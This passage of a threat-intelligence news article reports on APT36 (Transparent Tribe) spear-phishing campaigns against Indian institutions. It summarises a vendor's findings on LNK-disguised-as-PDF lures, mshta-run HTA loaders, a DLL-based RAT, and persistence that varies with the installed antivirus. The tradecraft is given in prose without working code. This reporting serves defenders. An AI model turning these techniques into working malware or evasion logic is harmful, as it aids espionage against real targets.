The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts.
“The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion,” CYFIRMA said in a technical report.
Transparent Tribe, also called APT36, is a hacking group that’s known for mounting cyber espionage campaigns against Indian organizations. Assessed to be of Pakistani origin, the state-sponsored adversary has been active since at least 2013.
The threat actor boasts of an ever-evolving arsenal of RATs to realize its goals. Some of the trojans put to use by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.
The latest set of attacks began with a spear-phishing email containing a ZIP archive with a LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML Application (HTA) script using “mshta.exe” that decrypts and loads the final RAT payload directly in memory. In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users’ suspicion.
“After decoding logic is established, the HTA leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment,” CYFIRMA noted. “This behavior demonstrates environment profiling and runtime manipulation, ensuring compatibility with the target system and increasing execution reliability techniques commonly observed in malware abusing ‘mshta.exe.’”
A noteworthy aspect of the malware is its ability to adapt its persistence method based on the antivirus solutions installed on the infected machine –
- If Kapsersky is detected, it creates a working directory under “C:\Users\Public\core\,” writes an obfuscated HTA payload to disk, and establishes persistence by dropping a LNK file in the Windows Startup folder that, in turn, launches the HTA script using “mshta.exe”
- If Quick Heal is detected, it establishes persistence by creating a batch file and a malicious LNK file in the Windows Startup folder, writing the HTA payload to disk, and then calling it using the batch script
- If Avast, AVG, or Avira are detected, it works by directly copying the payload into the Startup directory and executing it
- If no recognized antivirus solution is detected, it falls back to a combination of batch file execution, registry based persistence, and payload deployment prior to launching the batch script
The second HTA file includes a DLL named “iinneldc.dll” that functions as a fully-featured RAT, supporting remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
“APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber-espionage threat, with a sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors,” the cybersecurity company said.
In recent weeks, APT36 has also been linked to another campaign that leverages a malicious shortcut file disguised as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader, which then drops additional executables and malicious DLLs to establish remote command execution, system reconnaissance, and long-term access.
The shortcut is designed to execute an obfuscated command using cmd.exe to retrieve an MSI installer (“nikmights.msi”) from a remote server (“aeroclubofindia.co[.]in”), which is responsible for initiating a series of actions –
- Extract and display a decoy PDF document to the victim
- Decode and write DLL files to “C:\ProgramData\PcDirvs\pdf.dll” and “C:\ProgramData\PcDirvs\wininet.dll”
- Drop “PcDirvs.exe” to the same the same location and execute it after a delay of 10 seconds
- Establish persistence by creating “PcDirvs.hta” that contains Visual Basic Script to make Registry modifications to launch “PcDirvs.exe” every time after system startup
It’s worth pointing out that the lure PDF displayed is a legitimate advisory issued by the National Cyb
